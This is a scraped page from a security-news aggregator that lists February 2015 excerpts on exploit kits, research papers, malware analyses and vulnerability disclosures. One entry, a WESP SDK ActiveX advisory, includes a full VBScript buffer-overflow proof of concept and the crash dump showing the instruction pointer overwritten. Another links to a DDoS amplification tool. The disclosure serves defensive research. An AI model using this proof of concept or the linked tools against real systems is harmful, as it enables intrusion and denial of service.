Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

RIG Exploit Kit – Diving Deeper into the Infrastructure

February 23, 2015, 2:23 pm
$
0
0
Following our previous blog post about the leaking of the RIG exploit kit's source code, we dug deeper into the architecture that facilitates the massive infections using RIG. The screen shot below diagrams RIG's infrastructure.
1RIG Exploit Kit Infrastructure
Most commonly we see only the one end of this rabbit hole--the compromised site and the proxy server. Below we will detail what happens behind the scenes during the infection and explain how RIG customers use it to deploy their infection campaigns.

more here...........https://www.trustwave.com/Resources/SpiderLabs-Blog/RIG-Exploit-Kit-%E2%80%93-Diving-Deeper-into-the-Infrastructure/
Search

Paper: Exploiting and Protecting Dynamic Code Generation

February 23, 2015, 2:33 pm
$
0
0
Abstract—Many mechanisms have been proposed and deployed
to prevent exploits against software vulnerabilities. Among
them, W⊕X is one of the most effective and efficient. W⊕X
prevents memory pages from being simultaneously writable
and executable, rendering the decades old shellcode injection
technique infeasible.
In this paper, we demonstrate that the traditional shellcode
injection attack can be revived through a code cache injection
technique. Specifically, dynamic code generation, a technique
widely used in just-in-time (JIT) compilation and dynamic binary
translation (DBT), generates and modifies code on the fly in order
to promote performance or security. The dynamically generated
code fragments are stored in a code cache, which is writable
and executable either at the same time or alternately, resulting
in an opportunity for exploitation. This threat is especially
realistic when the generated code is multi-threaded, because
switching between writable and executable leaves a time window
for exploitation. To illustrate this threat, we have crafted a proofof-concept
exploit against modern browsers that support Web
Workers.
To mitigate this code cache injection threat, we propose a
new dynamic code generation architecture. This new architecture
relocates the dynamic code generator to a separate process,
in which the code cache is writable. In the original process
where the generated code executes, the code cache remains readonly.
The code cache is synchronized across the writing process
and the execution process through shared memory. Interaction
between the code generator and the generated code is handled
transparently through remote procedure calls (RPC). We have
ported the Google V8 JavaScript engine and the Strata DBT
to this new architecture. Our implementation experience showed
that the engineering effort for porting to this new architecture
is minimal. Evaluation of our prototype implementation showed
that this new architecture can defeat the code cache injection
attack with small performance overhead.

more here.........http://wenke.gtisc.gatech.edu/papers/sdcg.pdf

Hacking Oklahoma State University’s Student ID

February 23, 2015, 4:53 pm
$
0
0
In 2013 I took an Information Security class at Oklahoma State University. As a final project, we were broken into teams to find a security hole, and have a plan to theoretically exploit it.

I led this project, and in early 2014, gave a presentation to key faculty and IT security on campus. As I understand it, the final solution was to take down the website (https://app.it.okstate.edu/idcard/), and not worry about the rest. Fair enough.

Here http://snelling.io/hacking-oklahoma-state-university-student-id are the contents of my final report.

DDOS AMPLIFICATION ATTACKS & LINK TO DDOS AMPLIFICATION TOOL

February 23, 2015, 5:02 pm
$
0
0
During the last two years, we've seen DDoS attacks taking down high authority websites and networks. Unlike what we used to think that such attacks needs a large scale of resources (botnet or many compromised servers), these attacks are carried out by individuals or small number of people (often teenagers) with limited resources.

more here.........http://www.pythonforpentesting.com/2015/02/ddos-amplification-attacks.html


DDOS AMP TOOL here...............https://github.com/OffensivePython/Saddam

WESP SDK multiple Remote Code Execution Vulnerabilities

February 24, 2015, 2:28 am
$
0
0
Webgate technology is focused on digital image processing, embedded system
design and networking to produce embedded O/S and web server cameras
providing real time images. We are also making superior network stand-alone
DVRs by applying our accumulated network and video solution knowledge.

WEBGATE Embedded Standard Protocol (WESP) SDK supports same tools in both
network DVR and network camera.

Webgate Inc. Business Partners: Honeywell, Samsung Techwin, Bosch, Pentax
Technology, Fujitsu AOS Technology, inc

http://www.webgateinc.com/wgi/eng/#2
http://www.webgateinc.com/wgi_htdocs/eng/sdk_info.html

Vulnerability 1:  WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX LoadImage
Buffer Overflow
Vulnerability 2: WESP SDK WESPCONFIGLib.UserItem ActiveX ChangePassword
Buffer Overflow
Vulnerability 3: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX
LoadImageEx Buffer Overflow
Vulnerability 4: WESP SDK WESPSERIALPORTLib.WESPSerialPortCtrl ActiveX
Connect Buffer Overflow
Vulnerabilit 5: WESP SDK WESPCONFIGLib.IDList ActiveX AddID Buffer Overflow
Vulnerability 6: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX Connect
Buffer Overflow
Vulnerability 7: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX
ConnectEx3 Buffer Overflow


CompanyName WebgateInc
FileDescription WESPConfig Module
FileVersion 1, 6, 42, 0
InternalName WESPConfig
LegalCopyright Copyright (C) 2004-2010
OriginalFileName WESPConfig.DLL
ProductName WESPConfig Module
ProductVersion 1, 6, 42, 0

******************PoC for one of the above Vulnerabilities***********
<html>
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'>
</object>
<!--
targetFile = "C:\Windows\System32\WESPSDK\WESPPlayback.dll"
prototype  = "Sub ConnectEx3 ( ByVal bDvrs As Integer ,  ByVal Address As
String ,  ByVal Port As Integer ,  ByVal UserID As String ,  ByVal Password
As String ,  ByVal extcompany As Long ,  ByVal authType As Long ,  ByVal
AdditionalCode As String )"
memberName = "ConnectEx3"
progid     = "WESPPLAYBACKLib.WESPPlaybackCtrl"
argCount   = 8
-->
<script language='vbscript'>

arg1=1
arg2=String(1044, "A")
arg3=1
arg4="defaultV"
arg5="defaultV"
arg6=1
arg7=1
arg8="defaultV"

target.ConnectEx3 arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7 ,arg8

</script>
</html>
******************************
Stack trace for above PoC
Exception Code: ACCESS_VIOLATION
Disasm: 76ACD33D MOV CX,[EAX]

Seh Chain:
--------------------------------------------------
1 41414141


Called From                   Returns To
--------------------------------------------------
msvcrt.76ACD33D               WESPPlayback.999539
WESPPlayback.999539           41414141
41414141                      22E5E0
22E5E0                        2F712C
2F712C                        41414141
41414141                      41414141
41414141                      41414141
41414141                      41414141


Registers:
--------------------------------------------------
EIP 76ACD33D
EAX 41414141
EBX 039E0040 -> 009DF298
ECX E0551782
EDX 41414141
EDI 76AD4137 -> 8B55FF8B
ESI 76ACD335 -> 8B55FF8B
EBP 0022E56C -> 039E0020
ESP 0022E56C -> 039E0020


Block Disassembly:
--------------------------------------------------
76ACD333 NOP
76ACD334 NOP
76ACD335 MOV EDI,EDI
76ACD337 PUSH EBP
76ACD338 MOV EBP,ESP
76ACD33A MOV EAX,[EBP+8]
76ACD33D MOV CX,[EAX]  <--- CRASH
76ACD340 INC EAX
76ACD341 INC EAX
76ACD342 TEST CX,CX
76ACD345 JNZ SHORT 76ACD33D
76ACD347 SUB EAX,[EBP+8]
76ACD34A SAR EAX,1
76ACD34C DEC EAX
76ACD34D POP EBP


ArgDump:
--------------------------------------------------
EBP+8 41414141
EBP+12 0022E5E0 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+20 00000829
EBP+24 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+28 0022E6D4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


Stack Dump:
--------------------------------------------------
22E56C 20 00 9E 03 39 95 99 00 41 41 41 41 E0 E5 22 00  [................]
22E57C 2C 71 2F 00 29 08 00 00 2C 71 2F 00 D4 E6 22 00  [.q.......q......]
22E58C B4 6F 2F 00 A0 E6 22 00 98 F2 9D 00 00 00 00 00  [.o..............]
22E59C B0 BA 2E 00 00 00 00 00 00 00 00 00 00 00 00 00  [................]
22E5AC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  [................]

P.S. CERT tried to coordinate with the vendor for fixing the issues but
there wasn't any response from vendor

Best Regards,
Praveen Darshanam

Paper: Surreptitiously Weakening Cryptographic Systems (Bruce Schneier; Matthew Fredrikson; Tadayoshi Kohno; Thomas Ristenpart)

February 24, 2015, 5:41 am
$
0
0
Revelations over the past couple of years highlight the importance of understanding malicious and
surreptitious weakening of cryptographic systems. We provide an overview of this domain, using a number of historical examples to drive development of a weaknesses taxonomy. This allows comparing different approaches to sabotage. We categorize a broader set of potential avenues for weakening systems using this taxonomy, and discuss what future research is needed to provide sabotage-resilient cryptography.

more here.............http://eprint.iacr.org/2015/097.pdf

The Malicious Loader from the Cloud

February 24, 2015, 5:45 am
$
0
0
Recently, we found a simple malicious downloader that downloads a fake PDF file.  Unlike a normal malicious loader that integrates the PE Loader code into its binary, this loader has stripped this part and has turned to fetching it online.

more here.........http://blog.fortinet.com/post/the-malicious-loader-from-the-cloud

Targeted Attacks Against Code Underlying Financial Companies’ Trading Algorithms Are On the Rise

February 24, 2015, 7:47 am
$
0
0
Security experts have observed an increasing number of targeted attacks against the code underlying financial companies’ in-house trading algorithms.

more here.......http://www.tripwire.com/state-of-security/latest-security-news/targeted-attacks-against-code-underlying-financial-companies-trading-algorithms-are-on-the-rise/
Search

Simple Code Coverage Analyzer

February 24, 2015, 7:51 am
$
0
0
coco.cpp is a simple pintool for code coverage analysis. It comes with the Pin Framework.

more here........http://reversingonwindows.blogspot.com/2015/02/simple-code-coverage-analyzer.html?spref=tw

Proving that Android’s, Java’s and Python’s sorting algorithm is broken (and showing how to fix it)

February 24, 2015, 7:59 am
$
0
0
Tim Peters developed the Timsort hybrid sorting algorithm in 2002. It is a clever combination of ideas from merge sort and insertion sort, and designed to perform well on real world data. TimSort was first developed for Python, but later ported to Java (where it appears as java.util.Collections.sort and java.util.Arrays.sort) by Joshua Bloch (the designer of Java Collections who also pointed out that most binary search algorithms were broken). TimSort  is today used as the default sorting algorithm for Android SDK, Sun’s JDK and OpenJDK. Given the popularity of these platforms this means that the number of computers, cloud services and mobile phones that use TimSort for sorting is well into the billions.

Fast forward to 2015. After we had successfully verified Counting and Radix sort implementations in Java (J. Autom. Reasoning 53(2), 129-139) with a formal verification tool called KeY, we were looking for a new challenge.  TimSort seemed to fit the bill, as it is rather complex and widely used. Unfortunately, we weren’t able to prove its correctness. A closer analysis showed that this was, quite simply, because TimSort was broken and our theoretical considerations finally led us to a path towards finding the bug (interestingly, that bug appears already in the Python implementation). This blog post shows how we did it.


more here...........http://envisage-project.eu/proving-android-java-and-python-sorting-algorithm-is-broken-and-how-to-fix-it/

PwC Doc: A deeper look into ScanBox cybercrime tool

February 24, 2015, 8:03 am
$
0
0
Security researchers have often made the mistake of assuming that when a specific tool was observed
being used in espionage attacks, it was representative of activity of a single actor. More frequently,
however, many are now identifying that distinct groups of attackers are sharing their toolsets, just as in the cybercrime world.

One such toolset, the ScanBox framework, is now shared between a number of groups who conduct
espionage attacks. Evidence suggests that these groups include those behind the recent Forbes and
Anthem attacks. This short paper outlines our current perspectives on the previously discussed espionage groups currently using the framework and a hint that a 5th player is getting in on the game.

more here..........http://pwc.blogs.com/files/cto-tib-20150223-01a.pdf

The Mac Facilitates Spying Too

February 24, 2015, 8:09 am
$
0
0
I’ve been sitting on this information for some time, waiting to get more research done before I publish a post. But since word has come out about how Lenovo preloads what amounts to very bad spyware on their PCs, I thought I should also just go right ahead to spill the beans on the Mac.

Yes, that’s right. Superfish is bad. The problem with the Mac is only slightly related in that it also involves SSL certificates. It’s also bad, in a different way. I haven’t found out how the situation got to be like this, but I’ll just tell you what is happening.

more here........http://zitseng.com/archives/7489

Delete Known Government-Linked Certificate Authorities in OSX

February 24, 2015, 8:11 am
$
0
0
Delete Known Government-Linked Certificate Authorities in OS X. This is in relation to the article titled "The Mac Facilitates Spying Too"

more here...........https://github.com/sammcj/delete-unknown-root-ca

NATIONAL INDUSTRIAL SECURITY PROGRAM OPERATING MANUAL

February 24, 2015, 8:17 am
$
0
0
Leaked document describes security measures used by NSA.
More here.........http://www.dss.mil/documents/odaa/nispom2006-5220.pdf

SSL Blacklist

February 24, 2015, 9:14 am
$
0
0
SSL Blacklist (SSLBL) is a project maintained by abuse.ch. The goal is to provide a list of "bad" SSL certificates identified by abuse.ch to be associated with malware or botnet activities. SSLBL relies on SHA1 fingerprints of malicious SSL certificates and offers various blacklists that can found in the SSL Blacklist section.

more here...........https://sslbl.abuse.ch/
Search

Malware Tracker: PDF Analysis

February 24, 2015, 10:04 am
$
0
0
If you're a intrusion analyst on a small team (or maybe you ARE the team), you may be the only resource that has to look at a myriad of possibly malicious files that trigger your IDS or SIEM. You may not have either the time or the forensics skills to properly inspect each PDF or Flash file or Office doc that set off an alert.
Fortunately, there are a lot of good resources available that can do at least a cursory examination of different types of files and indicate that you might need to flag that alert for investigation. That's not as good as having a forensics analyst to hand the file off to, but it's a whole lot better than ignoring the alert because you don't have the time or training to deal with it.

more here..........http://jeffsoh.blogspot.com/2015/02/malware-tracker-pdf-analysis.html

Cloudflare: TLS Session Resumption: Full-speed and Secure

February 24, 2015, 10:13 am
$
0
0
In this article, I’ll explain how we added speed to Universal SSL with session resumptions across multiple hosts, and explain the design decisions we made in this process. Currently, we use two standardized session resumption mechanisms that require two different data sharing designs: Session IDs RFC 5246, and Session Tickets RFC 5077.

more here.........https://blog.cloudflare.com/tls-session-resumption-full-speed-and-secure/

Tearing Down Cryptowall (Cryptolocker and ransomware)

February 24, 2015, 10:24 am
$
0
0
In today's blog we show a new approach to stopping ransomware such as Cryptowall, and how it is possible to use analytics to detect the shift in user behavior caused by malware such as Cryptowall and even destructive variants. After recognizing the attack, we stop infected data from replicating to the cloud.

more here..........http://www.405labs.com/blog/2015/2/17/putting-an-end-to-cryptowall-cryptolocker-and-the-like

FLASH, CVE-2015-031 Exploit PoC

February 24, 2015, 3:08 pm
$
0
0
A critical vulnerability (CVE-2015-0311) exists in Adobe Flash Player 16.0.0.287 and earlier versions for Windows and Macintosh.  Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system.  We are aware of reports that this vulnerability is being actively exploited in the wild via drive-by-download attacks against systems running Internet Explorer and Firefox on Windows 8.1 and below.

PoC here...........http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/

Windows Exploit Mitigation Technology – Part 2

February 24, 2015, 5:11 pm
$
0
0
In Part 1, we explained GS cookies and Safe SEH. If you haven’t read that part, it is highly recommended to read it first.

The Enhanced Mitigation Experience Toolkit, or EMET, is rudimentally a shield or a shell that runs over Windows applications and protects them, regardless of how those applications have authentically been coded by their developer, to capitalize on security guards that are built into the Windows operating system. EMET is a wrapper that enables and enforces a set of protections that, when used together, genuinely enhance the security posture of a machine and greatly reduce the chance that exploits can run against your machine and cause any harm—most will simply fail to execute thoroughly.

more here.........http://resources.infosecinstitute.com/windows-exploit-mitigation-technology-part-2/
Viewing all 8064 articles
Browse latest View live
Search